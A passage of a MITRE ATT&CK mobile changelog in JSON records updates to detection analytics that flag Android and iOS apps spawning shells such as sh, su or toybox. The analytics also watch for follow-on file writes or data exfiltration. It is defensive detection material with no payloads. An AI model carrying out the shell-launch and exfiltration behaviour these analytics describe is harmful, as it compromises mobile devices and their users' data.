\"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"iOS:unifiedlog\", \"channel\": \"Supplemental anomaly in baseband, IOKit, accessory, security, or activation-related subsystem logging temporally adjacent to suspicious posture or network behavior\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to121__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to121__0\"><a href=\"#difflib_chg_to121__top\">t</a></td><td class=\"diff_header\" id=\"from121_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Integrity&nbsp;checking&nbsp;mechanisms&nbsp;can&nbsp;potentially&nbsp;detect&nbsp;unautho</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to121__top\">t</a></td><td class=\"diff_header\" id=\"to121_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">The&nbsp;defender&nbsp;observes&nbsp;a&nbsp;device&nbsp;at&nbsp;activation,&nbsp;supervision,&nbsp;o</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">rized&nbsp;hardware&nbsp;modifications.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">r&nbsp;enrollment&nbsp;time&nbsp;with&nbsp;unusual&nbsp;management-plane&nbsp;posture,&nbsp;inv</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">entory,&nbsp;or&nbsp;trust&nbsp;characteristics&nbsp;and&nbsp;then&nbsp;relies&nbsp;primarily&nbsp;o</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">n&nbsp;downstream&nbsp;network&nbsp;effects&nbsp;and&nbsp;device&nbsp;state&nbsp;inconsistencie</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">s&nbsp;rather&nbsp;than&nbsp;direct&nbsp;low-level&nbsp;process&nbsp;telemetry.&nbsp;On&nbsp;iOS,&nbsp;th</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">e&nbsp;most&nbsp;reliable&nbsp;sequence&nbsp;is&nbsp;supervision/attestation&nbsp;or&nbsp;inven</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">tory&nbsp;concern&nbsp;near&nbsp;first&nbsp;contact&nbsp;followed&nbsp;by&nbsp;network&nbsp;egress&nbsp;o</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">r&nbsp;protected-state&nbsp;behavior&nbsp;that&nbsp;is&nbsp;inconsistent&nbsp;with&nbsp;lock&nbsp;st</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ate,&nbsp;setup&nbsp;phase,&nbsp;or&nbsp;expected&nbsp;managed&nbsp;app&nbsp;activity.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--f2c74903-6770-4f55-9a11-edcf6e00938e",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-04-09 20:47:35.790000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0607#AN1657",
                            "external_id": "AN1657"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1657",
                    "description": "The defender correlates app-driven shell-launch behavior with subsequent execution of Unix shell processes or shell-script activity under the same app context, especially when execution occurs from background state, without recent user interaction, or is followed by file-system, privilege-escalation, or network effects inconsistent with the app's declared role. The analytic prioritizes Android-observable control-plane effects: Runtime or ProcessBuilder invocation, spawn of sh/toybox/toolbox/su or equivalent shell process, script-file staging or redirected output, and post-execution network or local artifact creation.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
                            "name": "MobileEDR:telemetry",
                            "channel": "Application invokes Runtime.exec, ProcessBuilder, JNI-backed command launcher, or equivalent command-execution bridge immediately before shell or command process creation"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0",
                            "name": "MobileEDR:telemetry",
                            "channel": "Application spawns Unix shell process or superuser binary such as sh, su, toybox, toolbox, or shell-like child process with parameters during execution phase"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Correlation window between shell-launch method use, Unix shell process creation, and follow-on file or network effects"
                        },
                        {
                            "field": "AllowedAppList",
                            "description": "Apps legitimately expected to run shells, such as approved terminal apps, enterprise support tools, device management agents, or developer tooling"
                        },
                        {
                            "field": "AllowedProcessPatterns",
                            "description": "Expected shell binaries, parent-child process chains, and helper-process patterns for approved apps"
                        },
                        {
                            "field": "ForegroundStateRequired",
                            "description": "Whether Unix shell execution should occur only during active user-driven workflows"
                        },
                        {
                            "field": "CommandArgumentRiskPatterns",
                            "description": "Environment-specific list of suspicious shell arguments, pipes, redirection, chaining operators, or privilege-escalation references"
                        },
                        {
                            "field": "SensitivePathPatterns",
                            "description": "Environment-specific list of high-value file paths or system locations touched after shell execution"
                        },
                        {
                            "field": "PostExecutionWriteThreshold",
                            "description": "Minimum number or size of artifacts created after shell execution to increase confidence"
                        },
                        {
                            "field": "UplinkBytesThreshold",
                            "description": "Minimum outbound volume after shell execution to treat network behavior as meaningful"
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Correlation window between shell-launch method use, Unix shell process creation, and follow-on file or network effects\"}, {\"field\": \"AllowedAppList\", \"description\": \"Apps legitimately expected to run shells, such as approved terminal apps, enterprise support tools, device management agents, or developer tooling\"}, {\"field\": \"AllowedProcessPatterns\", \"description\": \"Expected shell binaries, parent-child process chains, and helper-process patterns for approved apps\"}, {\"field\": \"ForegroundStateRequired\", \"description\": \"Whether Unix shell execution should occur only during active user-driven workflows\"}, {\"field\": \"CommandArgumentRiskPatterns\", \"description\": \"Environment-specific list of suspicious shell arguments, pipes, redirection, chaining operators, or privilege-escalation references\"}, {\"field\": \"SensitivePathPatterns\", \"description\": \"Environment-specific list of high-value file paths or system locations touched after shell execution\"}, {\"field\": \"PostExecutionWriteThreshold\", \"description\": \"Minimum number or size of artifacts created after shell execution to increase confidence\"}, {\"field\": \"UplinkBytesThreshold\", \"description\": \"Minimum outbound volume after shell execution to treat network behavior as meaningful\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-09 20:47:35.790000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"The defender correlates app-driven shell-launch behavior with subsequent execution of Unix shell processes or shell-script activity under the same app context, especially when execution occurs from background state, without recent user interaction, or is followed by file-system, privilege-escalation, or network effects inconsistent with the app's declared role. The analytic prioritizes Android-observable control-plane effects: Runtime or ProcessBuilder invocation, spawn of sh/toybox/toolbox/su or equivalent shell process, script-file staging or redirected output, and post-execution network or local artifact creation.\", \"old_value\": \"Command-line activities can potentially be detected through Mobile Threat Defense (MTD) integrations with lower-level OS APIs. This could grant the MTD agents access to running processes and their parameters, potentially detecting unwanted or malicious shells.\\nMobile Threat Defense (MTD) with lower-level OS APIs integrations may have access to newly created processes and their parameters, potentially detecting unwanted or malicious shells.\\nApplication vetting services could detect the invocations of methods that could be used to execute shell commands.(Citation: Samsung Knox Mobile Threat Defense)\\nMobile Threat Defense (MTD) with lower-level OS APIs integrations may have access to running processes and their parameters, potentially detecting unwanted or malicious shells.\", \"diff\": \"--- \\n+++ \\n@@ -1,4 +1 @@\\n-Command-line activities can potentially be detected through Mobile Threat Defense (MTD) integrations with lower-level OS APIs. This could grant the MTD agents access to running processes and their parameters, potentially detecting unwanted or malicious shells.\\n-Mobile Threat Defense (MTD) with lower-level OS APIs integrations may have access to newly created processes and their parameters, potentially detecting unwanted or malicious shells.\\n-Application vetting services could detect the invocations of methods that could be used to execute shell commands.(Citation: Samsung Knox Mobile Threat Defense)\\n-Mobile Threat Defense (MTD) with lower-level OS APIs integrations may have access to running processes and their parameters, potentially detecting unwanted or malicious shells.\\n+The defender correlates app-driven shell-launch behavior with subsequent execution of Unix shell processes or shell-script activity under the same app context, especially when execution occurs from background state, without recent user interaction, or is followed by file-system, privilege-escalation, or network effects inconsistent with the app's declared role. The analytic prioritizes Android-observable control-plane effects: Runtime or ProcessBuilder invocation, spawn of sh/toybox/toolbox/su or equivalent shell process, script-file staging or redirected output, and post-execution network or local artifact creation.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Application invokes Runtime.exec, ProcessBuilder, JNI-backed command launcher, or equivalent command-execution bridge immediately before shell or command process creation\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0\", \"name\": \"Command\", \"channel\": \"None\"}}, \"root['x_mitre_log_source_references'][1]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Application spawns Unix shell process or superuser binary such as sh, su, toybox, toolbox, or shell-like child process with parameters during execution phase\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077\", \"name\": \"Process\", \"channel\": \"None\"}}}, \"iterable_item_removed\": {\"root['external_references'][1]\": {\"source_name\": \"Samsung Knox Mobile Threat Defense\", \"description\": \"Samsung Knox Partner Program. (n.d.). Knox for Mobile Threat Defense. Retrieved March 30, 2022.\", \"url\": \"https://partner.samsungknox.com/mtd\"}, \"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962\", \"name\": \"Application Vetting\", \"channel\": \"None\"}, \"root['x_mitre_log_source_references'][3]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--ee575f4a-2d4f-48f6-b18b-89067760adc1\", \"name\": \"Process\", \"channel\": \"None\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to153__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to153__0\"><a href=\"#difflib_chg_to153__top\">t</a></td><td class=\"diff_header\" id=\"from153_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Command-line&nbsp;activities&nbsp;can&nbsp;potentially&nbsp;be&nbsp;detected&nbsp;through&nbsp;</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to153__top\">t</a></td><td class=\"diff_header\" id=\"to153_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">The&nbsp;defender&nbsp;correlates&nbsp;app-driven&nbsp;shell-launch&nbsp;behavior&nbsp;wit</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Mobile&nbsp;Threat&nbsp;Defense&nbsp;(MTD)&nbsp;integrations&nbsp;with&nbsp;lower-level&nbsp;OS</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">h&nbsp;subsequent&nbsp;execution&nbsp;of&nbsp;Unix&nbsp;shell&nbsp;processes&nbsp;or&nbsp;shell-scri</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;APIs.&nbsp;This&nbsp;could&nbsp;grant&nbsp;the&nbsp;MTD&nbsp;agents&nbsp;access&nbsp;to&nbsp;running&nbsp;pro</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">pt&nbsp;activity&nbsp;under&nbsp;the&nbsp;same&nbsp;app&nbsp;context,&nbsp;especially&nbsp;when&nbsp;exec</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">cesses&nbsp;and&nbsp;their&nbsp;parameters,&nbsp;potentially&nbsp;detecting&nbsp;unwanted&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ution&nbsp;occurs&nbsp;from&nbsp;background&nbsp;state,&nbsp;without&nbsp;recent&nbsp;user&nbsp;inte</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">or&nbsp;malicious&nbsp;shells.&nbsp;Mobile&nbsp;Threat&nbsp;Defense&nbsp;(MTD)&nbsp;with&nbsp;lower-</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">raction,&nbsp;or&nbsp;is&nbsp;followed&nbsp;by&nbsp;file-system,&nbsp;privilege-escalation</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">level&nbsp;OS&nbsp;APIs&nbsp;integrations&nbsp;may&nbsp;have&nbsp;access&nbsp;to&nbsp;newly&nbsp;created&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">,&nbsp;or&nbsp;network&nbsp;effects&nbsp;inconsistent&nbsp;with&nbsp;the&nbsp;app's&nbsp;declared&nbsp;ro</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">processes&nbsp;and&nbsp;their&nbsp;parameters,&nbsp;potentially&nbsp;detecting&nbsp;unwant</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">le.&nbsp;The&nbsp;analytic&nbsp;prioritizes&nbsp;Android-observable&nbsp;control-plan</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ed&nbsp;or&nbsp;malicious&nbsp;shells.&nbsp;Application&nbsp;vetting&nbsp;services&nbsp;could&nbsp;d</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">e&nbsp;effects:&nbsp;Runtime&nbsp;or&nbsp;ProcessBuilder&nbsp;invocation,&nbsp;spawn&nbsp;of&nbsp;sh</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">etect&nbsp;the&nbsp;invocations&nbsp;of&nbsp;methods&nbsp;that&nbsp;could&nbsp;be&nbsp;used&nbsp;to&nbsp;execu</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">/toybox/toolbox/su&nbsp;or&nbsp;equivalent&nbsp;shell&nbsp;process,&nbsp;script-file&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">te&nbsp;shell&nbsp;commands.(Citation:&nbsp;Samsung&nbsp;Knox&nbsp;Mobile&nbsp;Threat&nbsp;Defe</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">staging&nbsp;or&nbsp;redirected&nbsp;output,&nbsp;and&nbsp;post-execution&nbsp;network&nbsp;or&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">nse)&nbsp;Mobile&nbsp;Threat&nbsp;Defense&nbsp;(MTD)&nbsp;with&nbsp;lower-level&nbsp;OS&nbsp;APIs&nbsp;in</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">local&nbsp;artifact&nbsp;creation.</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">tegrations&nbsp;may&nbsp;have&nbsp;access&nbsp;to&nbsp;running&nbsp;processes&nbsp;and&nbsp;their&nbsp;pa</span></td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">rameters,&nbsp;potentially&nbsp;detecting&nbsp;unwanted&nbsp;or&nbsp;malicious&nbsp;shells</span></td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--649ee05c-9f09-47fc-802a-7df2ce362563",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-04-09 20:52:16.713000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0607#AN1658",
                            "external_id": "AN1658"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1658",
                    "description": "The defender correlates managed-app process-launch or shell-like execution effects with subsequent file or network activity by the same app, then raises confidence when execution occurs in background context, without recent user interaction, or appears tied to command delivery or output exfiltration. Because direct Unix-shell observability is typically weaker on iOS and child processes remain constrained by the app sandbox, the analytic anchors on process-execution effects where available and then on lifecycle, file, and network side effects rather than assuming rich shell-parameter visibility in all environments.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
                            "name": "MobileEDR:telemetry",
                            "channel": "Managed app invokes lower-level OS process-launch or command-execution behavior before file or network effects, including interpreter-like execution flow where visible to sensor"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Correlation window between shell-like execution indication, process effects, and follow-on file or network behavior"
                        },
                        {
                            "field": "AllowedAppList",
                            "description": "Managed apps legitimately expected to perform debugging, remote support, or enterprise automation tasks"
                        },
                        {
                            "field": "AllowedProcessPatterns",
                            "description": "Expected helper-process or process-launch patterns for approved managed apps"
                        },
                        {
                            "field": "ForegroundStateRequired",
                            "description": "Whether shell-like execution should occur only during active user-driven workflows"
                        },
                        {
                            "field": "ArtifactPathPatterns",
                            "description": "Expected temporary or output file locations for approved app behavior"
                        },
                        {
                            "field": "UplinkBytesThreshold",
                            "description": "Minimum outbound volume after shell-like execution to treat network behavior as meaningful"
                        }
                    ],
                    "x_mitre_platforms": [
                        "iOS"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Correlation window between shell-like execution indication, process effects, and follow-on file or network behavior\"}, {\"field\": \"AllowedAppList\", \"description\": \"Managed apps legitimately expected to perform debugging, remote support, or enterprise automation tasks\"}, {\"field\": \"AllowedProcessPatterns\", \"description\": \"Expected helper-process or process-launch patterns for approved managed apps\"}, {\"field\": \"ForegroundStateRequired\", \"description\": \"Whether shell-like execution should occur only during active user-driven workflows\"}, {\"field\": \"ArtifactPathPatterns\", \"description\": \"Expected temporary or output file locations for approved app behavior\"}, {\"field\": \"UplinkBytesThreshold\", \"description\": \"Minimum outbound volume after shell-like execution to treat network behavior as meaningful\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-09 20:52:16.713000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"The defender correlates managed-app process-launch or shell-like execution effects with subsequent file or network activity by the same app, then raises confidence when execution occurs in background context, without recent user interaction, or appears tied to command delivery or output exfiltration. Because direct Unix-shell observability is typically weaker on iOS and child processes remain constrained by the app sandbox, the analytic anchors on process-execution effects where available and then on lifecycle, file, and network side effects rather than assuming rich shell-parameter visibility in all environments.\", \"old_value\": \"Command-line activities can potentially be detected through Mobile Threat Defense (MTD) integrations with lower-level OS APIs. This could grant the MTD agents access to running processes and their parameters, potentially detecting unwanted or malicious shells.\\nMobile Threat Defense (MTD) with lower-level OS APIs integrations may have access to newly created processes and their parameters, potentially detecting unwanted or malicious shells.\\nApplication vetting services could detect the invocations of methods that could be used to execute shell commands.(Citation: Samsung Knox Mobile Threat Defense)\\nMobile Threat Defense (MTD) with lower-level OS APIs integrations may have access to running processes and their parameters, potentially detecting unwanted or malicious shells.\", \"diff\": \"--- \\n+++ \\n@@ -1,4 +1 @@\\n-Command-line activities can potentially be detected through Mobile Threat Defense (MTD) integrations with lower-level OS APIs. This could grant the MTD agents access to running processes and their parameters, potentially detecting unwanted or malicious shells.\\n-Mobile Threat Defense (MTD) with lower-level OS APIs integrations may have access to newly created processes and their parameters, potentially detecting unwanted or malicious shells.\\n-Application vetting services could detect the invocations of methods that could be used to execute shell commands.(Citation: Samsung Knox Mobile Threat Defense)\\n-Mobile Threat Defense (MTD) with lower-level OS APIs integrations may have access to running processes and their parameters, potentially detecting unwanted or malicious shells.\\n+The defender correlates managed-app process-launch or shell-like execution effects with subsequent file or network activity by the same app, then raises confidence when execution occurs in background context, without recent user interaction, or appears tied to command delivery or output exfiltration. Because direct Unix-shell observability is typically weaker on iOS and child processes remain constrained by the app sandbox, the analytic anchors on process-execution effects where available and then on lifecycle, file, and network side effects rather than assuming rich shell-parameter visibility in all environments.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Managed app invokes lower-level OS process-launch or command-execution behavior before file or network effects, including interpreter-like execution flow where visible to sensor\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0\", \"name\": \"Command\", \"channel\": \"None\"}}}, \"iterable_item_removed\": {\"root['external_references'][1]\": {\"source_name\": \"Samsung Knox Mobile Threat Defense\", \"description\": \"Samsung Knox Partner Program. (n.d.). Knox for Mobile Threat Defense. Retrieved March 30, 2022.\", \"url\": \"https://partner.samsungknox.com/mtd\"}, \"root['x_mitre_log_source_references'][1]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077\", \"name\": \"Process\", \"channel\": \"None\"}, \"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962\", \"name\": \"Application Vetting\", \"channel\": \"None\"}, \"root['x_mitre_log_source_references'][3]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--ee575f4a-2d4f-48f6-b18b-89067760adc1\", \"name\": \"Process\", \"channel\": \"None\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to206__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to206__0\"><a href=\"#difflib_chg_to206__top\">t</a></td><td class=\"diff_header\" id=\"from206_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Command-line&nbsp;activities&nbsp;can&nbsp;potentially&nbsp;be&nbsp;detected&nbsp;through&nbsp;</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to206__top\">t</a></td><td class=\"diff_header\" id=\"to206_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">The&nbsp;defender&nbsp;correlates&nbsp;managed-app&nbsp;process-launch&nbsp;or&nbsp;shell-</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Mobile&nbsp;Threat&nbsp;Defense&nbsp;(MTD)&nbsp;integrations&nbsp;with&nbsp;lower-level&nbsp;OS</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">like&nbsp;execution&nbsp;effects&nbsp;with&nbsp;subsequent&nbsp;file&nbsp;or&nbsp;network&nbsp;activ</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;APIs.&nbsp;This&nbsp;could&nbsp;grant&nbsp;the&nbsp;MTD&nbsp;agents&nbsp;access&nbsp;to&nbsp;running&nbsp;pro</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ity&nbsp;by&nbsp;the&nbsp;same&nbsp;app,&nbsp;then&nbsp;raises&nbsp;confidence&nbsp;when&nbsp;execution&nbsp;o</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">cesses&nbsp;and&nbsp;their&nbsp;parameters,&nbsp;potentially&nbsp;detecting&nbsp;unwanted&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ccurs&nbsp;in&nbsp;background&nbsp;context,&nbsp;without&nbsp;recent&nbsp;user&nbsp;interaction</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">or&nbsp;malicious&nbsp;shells.&nbsp;Mobile&nbsp;Threat&nbsp;Defense&nbsp;(MTD)&nbsp;with&nbsp;lower-</span></td><td class=\"diff_next\"></td><td 